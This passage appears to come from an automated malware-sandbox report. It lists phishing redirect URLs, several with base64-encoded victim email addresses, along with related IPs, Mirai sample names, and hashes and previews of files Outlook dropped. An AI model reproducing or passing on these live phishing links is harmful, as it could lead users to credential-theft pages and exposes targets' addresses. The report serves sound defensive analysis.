                                                                                                                                                                                                https://www.google.com/travel/clk?pc=AA80OsxOJqDJTtimFViThn67OQkloT30Ajm0l4ZvLJJer0pJHlDs6FtKUzjSNqFcVCDDRK9HbWM9J68g_B5lWBQlAc6FRf4zwpPAQbYRTV4byfvHC1SF4YRK3ax3ADGyZ2SM3lU&pcurl=https://www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252Fcravebooks.com%25252Fstore-sidebar-book-click%25253Fredirect_url%2525253DaHR0cDovL2xiLnBheXZlbmRob3N0aW5nLmNvbS9sYWxhbmRpYWJpbGx1bmQvcGFya2luZy9MYW5ndWFnZS9TZXRDdWx0dXJlP2N1bHR1cmU9ZGEtREsmcmV0dXJuVXJsPWh0dHA6Ly91NDYyMDY0OTUuY3Quc2VuZGdyaWQubmV0JTJGbHMlMkZjbGljayUzRnVwbiUzRHUwMDEuUUxZaGctMkJLdlRzSjRYVWQyVzg2QlVabEp2cTdudzNFUFB1YnpkRFhBbUFOb1FQLTJGS3hyMlBnMFdqWlFBdjN4QmlJdkpUaU9HbG9tbjdBQzVXM1hOM3d2VVdUYkEtMkJ0VXA0aFFOdERPNkY4S2QzTy0yQlZ1RFlhMHhXaTc0cExOZmJ6YXJIRDZ2N1BVcTZLLTJCRVNjSFFKbmNWYm5oRTE0WlV1Y1VJTGZRLTJGYmdNRGhkS3hPcGZsZ0NTUWlyY0twOHhvYU80Tm1yd1VBc2VURHF3RFE2YjdhTFV3QlVJM0VPVXEzQVJwaFp3R29TNXp6OEdtN3hjc3RjbVFXZFJ6NFBuajVSVXFiU25GZ0oyMEcxcFZaM1lVMkYtMkZBeURBY2N4VzRBQ2RhVTFsU1RYZHBBN09nRS0yRlM5MWM1TS0yQlZiUTA2LTJCZ0prY0QtMkIwd0pWaldOZFlaT2FUZjhTYUdmZy0zRC0zRGlwd0JfcDZiOVBGLTJGUEJoQ1ZjSWFPLTJCVkEybnhzcjNBa0Zzdkxza1IwMDRwaXU2QmVyZ1ZiMFN3OE5YTzEyTE5lbUlnRzQtMkJCVmtOaWJXa0FLY0lManZHS3V6dmVvek1LVlczSmRJN0Q3RDhaZDd0T3JRNUg5SWhnOThRamtvSkhFajN6R0o5VlNQaXJIZGFUNTVBVHVpeFNiM3RsMlhaU0twWDc4bUhsRzA4OFpkdnJrYWNqWjRIVHNRa0I5YW4wT0lRRVhFOUhVVEtSOWxLRTUtMkJ4Tk5LWk1oUm12YzZHR3VJTHprRi0yQmFMUS0yRlB4RUNDMFVDOGtVenhQSmdzamRHQzdSZ2tlTUFjSExRc2h1VzJyQVFkS3hYeE5lSWxBTUw1eGJGOER4VENpY3lLNVpSeVoxTjFjRjBjekQ1aFNaOXVxZGlSOUdzU2JTOTRkQ3ctMkJGZWw3V3g5QXdmZTZYd0tkOTNrbERXNnJOcUd6WFoyVjBvMXBxZmVoOVZBLTJGTUVHaldlOUdpaWs4enROaWZCNFRtbXpPcVRSTXpQU3NiSlZVdUhKb2dMZmR0MnB2cmtGa0xaQ3EwYTZjVUhDd0l0dy0yQkFXbHhsaw%2525253D%2525253D%252526c%25253DE%25252C1%25252CDR46MsYBoqQYCIR265tDuHDy_G5rYCXcSJD3yqZE084XnwKAnmUdOkGTEGQQhlwGOYj_RpZJHPPpeiAVAfJ08NWAIzAZZeX1VKIwBKyDiJ-Dg8gikcGjT85owT4%25252C%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 3.122.36.242
                                                                                                                                                                                                https://www.google.com/travel/clk?pc=AA80OsxOJqDJTtimFViThn67OQkloT30Ajm0l4ZvLJJer0pJHlDs6FtKUzjSNqFcVCDDRK9HbWM9J68g_B5lWBQlAc6FRf4zwpPAQbYRTV4byfvHC1SF4YRK3ax3ADGyZ2SM3lU&pcurl=https://www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttp%25253A%25252F%25252Fau.bestreviews.guide%25252Famp%25252Fredirect%25253Frf_dws_location%2525253D%25252526rf_item_id%2525253D284553988%25252526rf_list_id%2525253D4693819%25252526rf_partner_id%2525253DB017M5JDX0%25252526rf_source%2525253Damazon%25252526url%2525253DaHR0cHM6Ly9tb2FyYWRlZm9jLnJvL29mZXJ0YS1udW50YS0yMDIzLz9wb3BiX3BJRD0zNzIxJnBvcGJfdHJhY2tfdXJsPWh0dHA6Ly9wYWlnZTA5Mi5naXRodWIuaW8lMkYwNTAyOTIzZDM0MGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjIwMDA5ODQ5OTEyMDklMkY%2525253D%252526c%25253DE%25252C1%25252CDR46MsYBoqQYCIR265tDuHDy_G5rYCXcSJD3yqZE084XnwKAnmUdOkGTEGQQhlwGOYj_RpZJHPPpeiAVAfJ08NWAIzAZZeX1VKIwBKyDiJ-Dg8gikcGjT85owT4%25252C%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw3xlcg3a9X_y80WSUzYxlrB%26sa%3DD%26source%3Deditors%26ust%3D1723654483940330%26usg%3DAOvVaw3iBZdZ4Xq06xRpitwHmKAk%23cmljaGFyZC5oZW5uZXNzeUBkdnNhLmdvdi51aw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 3.75.62.36
                                                                                                                                                                                                djdjkdlellekkff.gharelokhana.comhttps://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.191.86
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                AMAZON-02USarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 3.78.69.82
                                                                                                                                                                                                https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2&c=E,1,dm0BsgXKEvQ4zpCWn9a_2TfhSLR8cGZr1-6jweGjTe0este5fASkeQZVLyX1Cz6QCtMNdDqQcYMIspu_vSObo4Nb1k5TezzFhTJcItmtEfuL-cJkW8Q4C3U6rUA,&typo=1&ancr_add=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.213.221.104
                                                                                                                                                                                                https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 18.138.137.135
                                                                                                                                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 3.126.185.238
                                                                                                                                                                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 54.64.32.233
                                                                                                                                                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 35.179.143.200
                                                                                                                                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 13.114.223.24
                                                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 3.160.32.158
                                                                                                                                                                                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 52.9.190.148
                                                                                                                                                                                                ASN-DPSDUShttps://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.191.86
                                                                                                                                                                                                https://aaanycyytg7pagn3.mylandingpages.co/pdffile/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.173.174
                                                                                                                                                                                                https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.191.86
                                                                                                                                                                                                http://fdgfhvcfdgfhhjh.gharelokhana.com/common/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.191.86
                                                                                                                                                                                                https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 164.92.191.86
                                                                                                                                                                                                owari.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 164.92.0.72
                                                                                                                                                                                                scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 164.92.90.203
                                                                                                                                                                                                https://patient-monkey-3045e7.instawp.xyz/wp-content/uploads/2024/11/PAYMENT-1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 164.92.84.225
                                                                                                                                                                                                bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                                                                                • 164.92.228.157
                                                                                                                                                                                                bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 164.92.228.157
                                                                                                                                                                                                LocawebServicosdeInternetSABRhttps://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 191.252.140.51
                                                                                                                                                                                                https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 191.252.140.51
                                                                                                                                                                                                xd.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 177.153.153.243
                                                                                                                                                                                                https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 191.252.162.52
                                                                                                                                                                                                loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 177.52.131.58
                                                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 177.153.173.40
                                                                                                                                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 186.202.55.174
                                                                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 201.76.54.187
                                                                                                                                                                                                SBAFLA TeamCALL marcia.main__ (lo).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 191.252.128.160
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):231348
                                                                                                                                                                                                Entropy (8bit):4.381403237393167
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:LHYL49+gsMpLWy0THUgsLXNcAz79ysQqt2KRKYqoQ7frcm0FvzYmyNkOOuLGW25p:kLggNIgMmiGu26qoQzrt0FvWDPCJynYt
                                                                                                                                                                                                MD5:69A02B2F1F7628BA6549F56DA5C6426F
                                                                                                                                                                                                SHA1:9BB8F1CE90B9BD76B9EC0F04B5846F0CF101EB16
                                                                                                                                                                                                SHA-256:E8F7C32E49F95AC169DFEF612BB050AF0C2F2FA7DA98C4E86636D3095ACBB2FB
                                                                                                                                                                                                SHA-512:25D665BF7681940A969C6CC9C5D54DCE637A723A7B89FDDE6D1637D981AA1D0903A0FDD5473CC1927DCBDFAB6401968D930728A98755442E3A31F9435EE9304F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:TH02...... .@n`..F......SM01X...,...`.R..F..........IPM.Activity...........h...............h............H..h.O.....>'iy...h.........<..H..h\hub ...AppD...h.O..0... .O....h.<@............h........_`.k...hR>@.@...I.Dw...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h..|.....8.O...#h....8.........$h.<......8....."h........h.....'h..............1h.<@.<.........0h....4.....k../h....h......kH..h....p....O...-h .......d.O...+h.<@.......O................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):181859
                                                                                                                                                                                                Entropy (8bit):5.295314768609144
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:yi2XfRAqSbH4wglE6Le7HW8Qjj/o/NMOcAZl1p5ihs7EXXNEADpOBIa5YdGVF8St:Sde7HW8Qjj/o/aXSbTx
                                                                                                                                                                                                MD5:992313072BF24C8F607E8AFCB1D1A970
                                                                                                                                                                                                SHA1:EADB4763A585B4146D280732A5693DFA3B637EC6
                                                                                                                                                                                                SHA-256:1C0E4FFA0D40C81E3A4665EB09FA5384138578B9C05C88640E2B79DCCD5307F4
                                                                                                                                                                                                SHA-512:4599E9EE6810EAAD463B87AF2B91A1E3394C8E20A5DA8AE2DF203D84E954CFD995FDD95263C64B84E90ED88FDD2BF9FB022522DBC52A8197323617DFE849169C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-12-05T07:23:50">.. Build: 16.0.18312.40138-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                Entropy (8bit):0.04591939678467531
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:GtkYQT2FlIPkYQT2F//9X01PH4l942wU:OQT2nsQT230G3L
                                                                                                                                                                                                MD5:6992AEF1B07715DFBBC492DD5DC56D77
                                                                                                                                                                                                SHA1:9AEDFE79A4792800844AD9E09A8CC3D3C5091C1C
                                                                                                                                                                                                SHA-256:60DE11BB8E1AA9954421A3BABEDC5D29946801EE61A337C61D19DF775ABE26CC
                                                                                                                                                                                                SHA-512:E67B33E796246C829658187F6235F2F70BF7D85D8BED9C2C902EB09A10D54623E124C781E41AFC26C18AB1A8A22345309812685DD9B5FD9DFD65667CF874F275
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:..-......................W..!.'.RE..Ww.*p....B..-......................W..!.'.RE..Ww.*p....B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):49472
                                                                                                                                                                                                Entropy (8bit):0.4823916763602375
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:TjfQ1ZUll7DYMCXzO8VFDYM/oBO8VFDYML:gIll41jVGKOjVGC
                                                                                                                                                                                                MD5:453784EE3BD3603AC86FF48E13DF94C3
                                                                                                                                                                                                SHA1:25D47460C4C53653CB1F8D42DE39AC73E4129AED
                                                                                                                                                                                                SHA-256:471928527804F1771B041DF14CBD9A204B247692D157D25F2D9DBBFEA853A3F1
                                                                                                                                                                                                SHA-512:B1B91F1936C237B713DA535A0D739DD84BCEDEDC88C7C94A0BABDDA254D9EADDB6F602C3C57C008F08DAE3033FB49F1DFE8A08B286B89F78FC0BF1E5343F0235
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:7....-...........RE..Wwh,U.k.G.........RE..Ww/W%{.D2.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 56x56, segment length 16, progressive, precision 8, 644x280, components 3
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):27163
                                                                                                                                                                                                Entropy (8bit):7.751400994365782
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:wpEbYy7DILIWzWzWzWzWxc2b8TEDRwsP1lvVs/MbQYU:wpEb3DILIWzWzWzWzWxc2b8TEt1lNEMQ
                                                                                                                                                                                                MD5:EBF16218586A1F57ACFD4967F8C512F7
                                                                                                                                                                                                SHA1:4FCA245C82FC1A1AE98745B6E5C0826738A69B60
                                                                                                                                                                                                SHA-256:93A55E2ECE664B4207EFA4D3DB164438B6760973DA7109BBAA7C4CA1274213A9
                                                                                                                                                                                                SHA-512:81129B4FA9CD3F77813DCB6D60D713465FF77B293B792F732621540019469121A7346C5E7CFEBC792F292F8009DC9F6F987BE8E7301453025036A2DE9EBD74E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:......JFIF.....8.8......ICC_PROFILE.......appl....mntrRGB XYZ ...........1acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):7140
                                                                                                                                                                                                Entropy (8bit):3.7523714516628313
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:Z9k/58s0IpgmOGffffffQ43gq2BVU4DaacZo+j7B:Z9eXa/nagNpH+jd
                                                                                                                                                                                                MD5:24C4B6A8B95F4703869FCA60878E9F05
                                                                                                                                                                                                SHA1:921E3DDE08B2DBAB0DCEC3C9AF3A2C0D5E0A35C5
                                                                                                                                                                                                SHA-256:75DB55D1925F4CA0FED7C54F71CA3D59D94832D44733A31CC7B3676533C910BF
                                                                                                                                                                                                SHA-512:5B37D50D6A8BD139FFA217C6C89C6F425C06ECE038CB9DCE25BA93B0B25D3456E74AEF0E496C0FB9A041977499D4455F9CEBA2903C6D5B92520E0F6106DC298B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b...l...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:ASCII text, with very long lines (28774), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):20971520
                                                                                                                                                                                                Entropy (8bit):0.16091560922552534
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:A/dSkta2TB9tsa3NMJMmt3UjOIAWJAxbLbiRlBpjrP99BjGipZ:Gt71sadvGOR
                                                                                                                                                                                                MD5:5694803ADBEC2E205DC86F2CABEC15B8
                                                                                                                                                                                                SHA1:84BB8A0A8DB22622DC9B33B15D8D5A4AD4DA6DF5
                                                                                                                                                                                                SHA-256:B3CE43C57DBA710F2E5E56CB95CB3F22123EF7B5983636CE0898F1A1A5E919BC
                                                                                                                                                                                                SHA-512:073CBA3D17EF5986AB119B05157E17D921F1D78B98BBB15E52DE11D77BD1E210932FEDD6DC2FC67865D343CB285A1C6F1A1513EE764862F0C02569C577F859D9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/05/2024 07:23:46.283.OUTLOOK (0x15E4).0x1050.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":22,"Time":"2024-12-05T07:23:46.283Z","Contract":"Office.System.Activity","Activity.CV":"MwUNYyGTMkycNR17Wr3BUQ.4.9","Activity.Duration":18,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...12/05/2024 07:23:46.361.OUTLOOK (0x15E4).0x1050.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-12-05T07:23:46.361Z","Contract":"Office.System.Activity","Activity.CV":"MwUNYyGTMkycNR17Wr3BUQ.4.10","Activity.Duration":17121,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):20971520
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                                                Entropy (8bit):4.4910113679966805
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:BGezSSBigyadCmC7raTsv6h8UbcEVln03cXI45Gf939kaxdXto:BGezSSBigyadCmC7raTsv6h8UbcEVlnB
                                                                                                                                                                                                MD5:CA08DFC6D804096BA0AECC0096BD14EB
                                                                                                                                                                                                SHA1:E30023BF81150EEF412408D608B605A092B62895
                                                                                                                                                                                                SHA-256:0DA276295912283B06D6914309FDE0E6C33D4C925CC6A232851B3065ADE547AA
                                                                                                                                                                                                SHA-512:37C01607846FCB6B064BEC0917A3B4304B3068F969DE3739558CF7C912914D9403322A1B242518068DCBCBA56792B231771EC931D7218AE9EE7795CE12D1672E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:............................................................................d...P.......S.W..F..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................P9>QZ...........S.W..F..........v.2._.O.U.T.L.O.O.K.:.1.5.e.4.:.d.5.e.d.5.a.1.e.4.3.1.1.4.9.2.2.9.2.4.d.f.5.e.5.7.0.0.1.e.1.4.d...C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.2.0.5.T.0.2.2.3.4.5.0.0.4.9.-.5.6.0.4...e.t.l...........P.P.P.......S.W..F..................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):163840
                                                                                                                                                                                                Entropy (8bit):0.46525460756119685
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:GAjLw0hOlxqDvz4eMlU41UAacNgiXHWIepOoqAbAWdNh/:GkL/v4eMlUxPbiXH9oqM
                                                                                                                                                                                                MD5:A35F73D0CBEB514FD0C987709D1E21D6
                                                                                                                                                                                                SHA1:7CE3961F2055F7CD8C03AE7A2D546CB73128726A
                                                                                                                                                                                                SHA-256:99CAF9D4E90CF05871E8EBE07CA94C3AB597307A8A45B0B913AD1590D44E971E
                                                                                                                                                                                                SHA-512:4C2DEDEBCBC9B4778B90E62F53721C00D9D5F8E77DE0753A9049F0D2E8A44B2CF65376F5900C8A1DC6C4300CB4B4FBC41D193B4E9C949738BCADFD699B96D3B3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                File Type:data
